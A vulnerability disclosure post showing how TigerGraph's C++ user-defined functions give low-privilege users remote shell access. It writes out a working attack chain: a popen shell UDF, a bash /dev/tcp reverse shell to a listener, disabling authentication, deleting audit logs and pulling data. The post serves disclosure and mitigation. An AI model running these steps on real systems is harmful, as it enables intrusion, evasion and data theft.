The TigerGraph graph database lets users remotely upload arbitrary C++ source code to create user-defined functions. That code is automatically compiled and installed into sensitive system components with little scrutiny. Due to a lack of safeguards, this process can be exploited with minimal permissions to give an attacker full control over an entire TigerGraph cluster and its underlying servers.

Background

In this post, we detail a critical CVE (Common Vulnerabilities and Exposures) that we discovered in the TigerGraph product. We withheld these details for three months to give TigerGraph sufficient time to fix the vulnerability and reinforce their security before the CVE became public.

In the next section, we show how a feature of TigerGraph’s GSQL query language can be used to escalate a user’s privileges to those of the administrative user, disable authentication, exfiltrate sensitive data, and then remove the audit trail.

At the time of writing, these issues affect the latest version of TigerGraph Server (3.6.0) and any other product derived from this code base, for instance the official TigerGraph Docker image. Although unconfirmed, TigerGraph Cloud is also potentially impacted.

The Problem

TigerGraph is a graph database that has a proprietary query language called GSQL. One of the features of GSQL is the ability to create Query User-Defined Functions (abbreviated to UDFs). A UDF is C++ source code that gets compiled and linked into the TigerGraph database to provide extra functionality to GSQL queries.

In TigerGraph, UDFs inherit the features of their implementation language, C++, which gives users access to unmanaged memory and unsafe pointers. Since there are no real runtime security protections, pointer and buffer overflow exploits are a real possibility. In fact, we found such an exploit, a buffer overflow, a few lines into TigerGraph’s LDBC code (which opened our eyes to this and other similar security shortcomings).
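
The class of bug is easy to illustrate. The sketch below is a hypothetical example, not the flaw we found in the LDBC code: copy_label_bounded is a name invented here and the 16-byte buffer size is arbitrary. It shows the length check that C++ leaves entirely to the author of a UDF.

```cpp
#include <algorithm>
#include <cstddef>
#include <cstring>
#include <string>

// Hypothetical helper (not TigerGraph code): copies `input` into a fixed
// 16-byte buffer without ever writing past its end.
// Anything that does not fit is dropped.
inline std::string copy_label_bounded(const std::string& input) {
    char label[16];
    // Leave one byte for the terminating NUL.
    const std::size_t n = std::min(input.size(), sizeof label - 1);
    std::memcpy(label, input.data(), n);
    label[n] = '\0';
    // An unchecked strcpy(label, input.c_str()) in place of the three lines
    // above would write past the array for inputs of 16 characters or more.
    return std::string(label);
}
```

The unchecked variant mentioned in the comment compiles just as cleanly, and given how little scrutiny uploaded code receives, it would likely be installed just the same.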

To highlight this critical security vulnerability, we start by demonstrating what users are permitted to do under normal operation of the system and how this undermines some assumptions made about security in TigerGraph. We first show how to obtain a remote shell with administrative privileges on a remote TigerGraph system.

The first step is to bring up a remote TigerGraph system, add some users with different levels of permissions, and create a test database. The instructions for doing this using Docker are provided in Appendix A: Setting Up the TigerGraph Server.

1. Remote Installation of a UDF

Once the system is up and running, we create a new UDF called run_shell_expr from the C++ code below. The UDF simply takes a string, evaluates it in a sub-shell, and returns the output:

cpp
inline string run_shell_expr (string cmd) {
    char buffer[4096];
    std::string result = "";
    // Run cmd in a sub-shell and open a pipe to read its standard output.
    FILE* pipe = popen(cmd.c_str(), "r");
    if (pipe) {
        try {
            // Collect the output one chunk at a time.
            while (fgets(buffer, sizeof buffer, pipe) != NULL) {
                result += buffer;
            }
        } catch (...) {
            /*...*/
        }
        pclose(pipe);
    }

    return string(result);
}

Once the UDF is saved in a file called udf.hpp on our local machine, we can use the GSQL client to install it on the remote system as the tigergraph user:

bash
$ java -jar gsql_client.jar -ip localhost
Adding gsql-server host localhost
Password for tigergraph : ***
If there is any relative path, it is relative to /dev/gdk/gsql
Welcome to TigerGraph.
GSQL > PUT ExprFunctions FROM "./udf.hpp"
PUT ExprFunctions successfully.

This copies our C++ source file across the network onto the TigerGraph system, where it is automatically compiled and installed. At this point, our UDF run_shell_expr is available for all users to call in their queries, even though it was uploaded by the superuser.

Note that for brevity the above code snippet omits some of the boilerplate code required to create a UDF but the full code is available in Appendix A: UDF Code.
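
Nothing in the function body is specific to TigerGraph, which is easy to confirm by compiling the same logic as an ordinary program. The following is a minimal standalone sketch, assuming a POSIX system (popen and pclose are POSIX rather than standard C++). It uses std::string directly because the typedef from the UDF file is not available outside it.

```cpp
#include <cstdio>
#include <string>

// Standalone sketch of the same logic as the run_shell_expr UDF.
// Runs `cmd` in a sub-shell and returns everything it wrote to stdout.
inline std::string run_shell_expr(const std::string& cmd) {
    char buffer[4096];
    std::string result;
    FILE* pipe = popen(cmd.c_str(), "r");
    if (pipe == nullptr) {
        return result;  // the sub-shell could not be started
    }
    // Read the command's output one chunk at a time.
    while (fgets(buffer, sizeof buffer, pipe) != nullptr) {
        result += buffer;
    }
    pclose(pipe);
    return result;
}
```

Calling run_shell_expr("id") from a small main function prints the identity of whichever account runs the program. Inside TigerGraph, that account is the tigergraph user.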

2. Remote Installation of a Query

The next step is to create a new query that calls the run_shell_expr UDF. Again this is a remote operation using the GSQL console, but executed by a low-privileged user – bob – who only has local permission to create and run queries on a graph called test (bob has only querywriter permissions). Below we show the GSQL commands to do this:

bash
$ java -jar gsql_client.jar -ip localhost -u bob
Adding gsql-server host localhost
Password for bob : ***
If there is any relative path, it is relative to /dev/gdk/gsql
Welcome to TigerGraph.
GSQL > use graph test
Using graph 'test'
GSQL > begin
GSQL > CREATE QUERY run_cmd(string cmd) FOR GRAPH test {
GSQL >   PRINT run_shell_expr(cmd);
GSQL > }
GSQL > end
Successfully created queries: [run_cmd].
GSQL > install query run_cmd
Start installing queries, about 1 minute ...
run_cmd query: curl -X GET 'https://127.0.0.1:9000/query/test/run_cmd?cmd=VALUE'. Add -H "Authorization: Bearer TOKEN" if authentication is enabled.
Select 'm1' as compile server, now connecting ...
Node 'm1' is prepared as compile server.

[========================================================================================================] 100% (1/1)
Query installation finished.
GSQL >

Once the run_cmd query is installed it will run simple commands on the remote TigerGraph system. In this case we use the id command to see that the UDF is being executed on the remote system by the application-level superuser: tigergraph.

GSQL
GSQL > RUN QUERY run_cmd("id")
{
  "error": false,
  "message": "",
  "version": {
    "schema": 0,
    "edition": "enterprise",
    "api": "v2"
  },
  "results": [{"run_shell_expr(cmd)": "uid=1000(tigergraph) gid=1000(tigergraph) groups=1000(tigergraph)\n"}]
}

3. Remotely Obtaining a Shell

Notice the following message displayed earlier when installing the query:

GSQL
run_cmd query: curl -X GET 'https://127.0.0.1:9000/query/test/run_cmd?cmd=VALUE'. Add -H "Authorization: Bearer TOKEN" if authentication is enabled.

This message tells us that TigerGraph has automatically created a REST endpoint for the run_cmd query. The next step is therefore to obtain a reverse shell running as the tigergraph user, this time using our least privileged user: alice.

For this to work properly, you will need to have a machine that you can route network traffic to on an external address and port. In this example, we use the IP address 192.168.0.2 and port 4444. Once you have your machine set up, open a new console window and in it use the netcat utility to listen to network traffic:

bash
$ nc -l 4444 -v

In another console, we simply send an HTTP POST request with alice’s authorization token:

bash
$ curl -X POST \
  -H 'Authorization: Bearer aa4upir75pntu90pckr2ldr395l3hh70' \
  https://localhost:14240/restpp/query/test/run_cmd \
  -d '{"cmd": "bash -c \"bash -i >& /dev/tcp/192.168.0.2/4444 0>&1\""}'
{"error":true,"message":"The query didn't finish because it exceeded the query timeout threshold (16 seconds). Please check GSE log for license expiration and RESTPP/GPE log with request id (65548.RESTPP_1_1.1659629508618.N) for details. Try increase RESTPP.Factory.DefaultQueryTimeoutSec or add header GSQL-TIMEOUT to override default system timeout. ","results":[],"code":"REST-3002"}%

Note that the URL differs slightly from the one printed during query installation because we are forwarding traffic into a Docker container.

A shell session will open in your first window in which you can freely execute commands as the tigergraph user:

bash
tigergraph@149bd9633fa6:/home/tigergraph/tigergraph/app/3.5.3/bin$ unset LD_PRELOAD
tigergraph@149bd9633fa6:/home/tigergraph/tigergraph/app/3.5.3/bin$ id
id
uid=1000(tigergraph) gid=1000(tigergraph) groups=1000(tigergraph)
tigergraph@149bd9633fa6:/home/tigergraph/tigergraph/app/3.5.3/bin$ pwd
pwd
/home/tigergraph/tigergraph/app/3.5.3/bin

4. Circumventing Security Features and Exfiltrating Data

Now that we have shell access as the administrative user, authentication can be disabled for the REST API and a selection of the system’s audit logs can be deleted to cover the attack:

bash
tigergraph@149bd9633fa6:/home/tigergraph/tigergraph/app/3.5.3/bin$ unset LD_PRELOAD
tigergraph@149bd9633fa6:/home/tigergraph/tigergraph/app/3.5.3/bin$ gadmin config set RESTPP.Factory.EnableAuth false
[   Info] Configuration has been changed. Please use 'gadmin config apply' to persist the changes.
tigergraph@149bd9633fa6:/home/tigergraph/tigergraph/app/3.5.3/bin$ gadmin config apply
[   Note] Changes:
RESTPP.Factory.EnableAuth: true -> false
Proceed to apply? (y/N)y
[   Info] Successfully applied configuration change. Please restart services to make it effective immediately.
tigergraph@149bd9633fa6:/home/tigergraph/tigergraph/app/3.5.3/bin$ gadmin restart restpp nginx gui gsql -y
[   Info] Stopping NGINX RESTPP GSQL GUI
[   Info] Starting ZK ETCD DICT KAFKA ADMIN GSE NGINX GPE RESTPP KAFKASTRM-LL KAFKACONN GSQL GUI
tigergraph@149bd9633fa6:/home/tigergraph/tigergraph/log$ rm gsql/* restpp/* controller/*

To prove that authentication is disabled, some sensitive data can be exfiltrated from a second graph test2 that has zero authorized users:

bash
$ curl -X GET "https://localhost:14240/restpp/graph/test2/vertices/Node"
{"version":{"edition":"enterprise","api":"v2","schema":1},"error":false,"message":"","results":[{"v_id":"1","v_type":"Node","attributes":{"id":1,"value":"hello"}}]}%

Compounding Factors

We have demonstrated that users who wish to can use the UDF facility in GSQL to circumvent all of TigerGraph’s security safeguards and exfiltrate sensitive data. More importantly, the actual attack can be performed through TigerGraph’s REST APIs using one of the least privileged roles in the system: queryreader.

The example scenario we used was designed for pedagogical purposes. One of the assumptions that we made is that the attacker would need to install a malicious UDF (something akin to the run_shell_expr UDF) and they would need administrative access to do that. However, it would be naive to dismiss the vulnerability based on the fact that installation privileges are required.

We provide three counterarguments to this line of thinking:

  1. It assumes that the system is free from exploitable bugs;
  2. It implicitly trusts anyone with access to the administrative user not to breach the integrity of the system; and
  3. It means that the administrative user has access to all sensitive data placed in the system.

The CVE demonstrates that TigerGraph has insufficient defenses to prevent a potential buffer overflow in a UDF from being exploited by a user with one of the lowest levels of privilege.

Mitigations

When presented with the exploit, TigerGraph confirmed that this is how they expect UDFs to behave and offered the following mitigations:

  • enable authentication for GSQL and the REST endpoints; and
  • change the default password of the tigergraph admin user.

TigerGraph’s Docker image has been updated so that remote GSQL clients now prompt the user to enter a password.

However, there remains little protection in the case of a bug being accidentally included in a UDF that is installed into the system (as is the case here) or, alternatively, if the attacker has access to the tigergraph user. Permitting unconstrained C++ to be linked to the TigerGraph binary is a risky architectural choice that carries significant downsides.

Recommendations

As long as the current system architecture, UDF design, and protection mechanisms stay as they are, this vulnerability will remain in the TigerGraph product.

Our recommendations for using TigerGraph in the meantime are to:

  • Avoid using UDFs, as even unused ones pose a security risk.
  • If UDFs must be used, sanitize all inputs passed between GSQL and a UDF. We acknowledge that this is very difficult, as it would have to be done either in a UDF or in GSQL.
  • Limit TigerGraph’s access to networks that contain sensitive data. Because a TigerGraph cluster is able to run arbitrary code, it is wise to restrict network traffic to and from it.
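
As a rough illustration of the second recommendation, the sketch below shows an allow-list check that a UDF could apply to a string argument before using it. The helper name is_safe_udf_argument, the permitted character set, and the 64-character limit are all assumptions made for this example. A check like this narrows what an attacker can pass in, but it does not make arbitrary C++ safe.

```cpp
#include <algorithm>
#include <cctype>
#include <cstddef>
#include <string>

// Hypothetical helper (not part of TigerGraph): accepts only short,
// non-empty strings made of ASCII letters, digits, '_', '-' and '.'.
// Shell metacharacters such as ';', '$', '|' and spaces are rejected.
inline bool is_safe_udf_argument(const std::string& arg,
                                 std::size_t max_len = 64) {
    if (arg.empty() || arg.size() > max_len) {
        return false;
    }
    return std::all_of(arg.begin(), arg.end(), [](unsigned char c) {
        return std::isalnum(c) != 0 || c == '_' || c == '-' || c == '.';
    });
}
```

A UDF would call the helper first and return an empty result when the check fails, rather than passing the raw argument on.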

Appendix A

Setting Up the TigerGraph Server

Using Docker, download the latest TigerGraph image and start the server. We follow the instructions provided by TigerGraph.

1. Download and run the docker image (note: we do not need to attach a volume):

bash
$ docker run -d \
	-p 14022:22 \
	-p 9000:9000 \
	-p 14240:14240 \
	--name tigergraph \
	--ulimit nofile=1000000:1000000 \
	-t docker.tigergraph.com/tigergraph:latest

2. Once the container has started, connect to it via ssh (note: the default password is tigergraph):

bash
$ ssh -p 14022 tigergraph@localhost

3. Start all TigerGraph services:

bash
$ gadmin start all

4. Create an empty graph using GSQL:

bash
$ gsql "create graph test()"

5. Create a user – alice – with minimal privileges using GSQL:

bash
$ gsql "create user"
User Name : alice
New Password : *****
Re-enter Password : *****

6. Grant privileges to alice:

bash
$ gsql -g test "grant role queryreader on graph test to alice"

7. Create secrets for alice:

bash
$ gsql -u alice -p alice -g test "create secret"
The secret: rdua9klbkp88t2jkd8me44nd5638d73t has been created for user "alice".

8. Create a user – bob – with enough privileges to create new queries using GSQL:

bash
$ gsql "create user"
User Name : bob
New Password : *****
Re-enter Password : *****

9. Grant privileges to bob:

bash
$ gsql -g test "grant role querywriter on graph test to bob"

10. Create a second graph called test2 and add a node to it:

bash
$ gsql
GSQL> CREATE VERTEX Node(PRIMARY_ID id UINT, value STRING) WITH primary_id_as_attribute="true"
GSQL> CREATE GRAPH test2(*)
GSQL> begin
GSQL> CREATE QUERY ins(UINT id, STRING value) FOR GRAPH test2 {
GSQL>   INSERT INTO Node VALUES(id, value);
GSQL> }
GSQL> end
GSQL> interpret query ins(1,"hello")

11. Change default password for the tigergraph user:

bash
$ gsql "alter password"

12. Enable RESTPP authentication:

bash
$ gadmin config set RESTPP.Factory.EnableAuth true
$ gadmin config apply
$ gadmin restart restpp nginx gui gsql -y


Setting Up a GSQL Client

1. Once TigerGraph is running, we can take a copy of gsql_client.jar from the running container. Note that you will need the correct version of the client to connect to the server successfully.

bash
$ docker cp tigergraph:/home/tigergraph/tigergraph/app/3.5.3/dev/gdk/gsql/lib/gsql_client.jar  gsql_client.jar 

2. To open a GSQL console session for a specific user, run the client as follows:

bash
$ java -jar gsql_client.jar -ip localhost -u <username>
Adding gsql-server host localhost
Password for <username> : *****
If there is any relative path, it is relative to /dev/gdk/gsql
Welcome to TigerGraph.
GSQL >


UDF Code


cpp
/******************************************************************************
 * Copyright (c) 2015-2016, TigerGraph Inc.
 * All rights reserved.
 * Project: TigerGraph Query Language
 * udf.hpp: a library of user defined functions used in queries.
 *
 * - This library should only define functions that will be used in
 *   TigerGraph Query scripts. Other logics, such as structs and helper
 *   functions that will not be directly called in the GQuery scripts,
 *   must be put into "ExprUtil.hpp" under the same directory where
 *   this file is located.
 *
 * - Supported type of return value and parameters
 *     - int
 *     - float
 *     - double
 *     - bool
 *     - string (don't use std::string)
 *     - accumulators
 *
 * - Function names are case sensitive, unique, and can't be conflict with
 *   built-in math functions and reserve keywords.
 *
 * - Please don't remove necessary codes in this file
 *
 * - A backup of this file can be retrieved at
 *     /dev_/gdk/gsql/src/QueryUdf/ExprFunctions.hpp
 *   after upgrading the system.
 *
 ******************************************************************************/

#ifndef EXPRFUNCTIONS_HPP_
#define EXPRFUNCTIONS_HPP_

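// The header names were lost from this listing. The headers below are an
// assumption: the standard ones that the functions in this file rely on.
#include <cstdint>
#include <cstdio>
#include <cstdlib>
#include <string>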

/**     XXX Warning!! Put self-defined struct in ExprUtil.hpp **
 *  No user defined struct, helper functions (that will not be directly called
 *  in the GQuery scripts) etc. are allowed in this file. This file only
 *  contains user-defined expression function's signature and body.
 *  Please put user defined structs, helper functions etc. in ExprUtil.hpp
 */
#include "ExprUtil.hpp"

namespace UDIMPL {
  typedef std::string string; //XXX DON'T REMOVE

  /****** BIULT-IN FUNCTIONS **************/
  /****** XXX DON'T REMOVE ****************/
  inline int64_t str_to_int (string str) {
    return atoll(str.c_str());
  }

  inline int64_t float_to_int (float val) {
    return (int64_t) val;
  }

  inline string to_string (double val) {
    char result[200];
    sprintf(result, "%g", val);
    return string(result);
  }

  inline string run_shell_expr (string cmd) {
    char buffer[4096];
    std::string result = "";
    // Run cmd in a sub-shell and open a pipe to read its standard output.
    FILE* pipe = popen(cmd.c_str(), "r");
    if (pipe) {
      try {
        // Collect the output one chunk at a time.
        while (fgets(buffer, sizeof buffer, pipe) != NULL) {
          result += buffer;
        }
      } catch (...) {
        /*...*/
      }
      pclose(pipe);
    }

    return string(result);
  }

}
/****************************************/

#endif /* EXPRFUNCTIONS_HPP_ */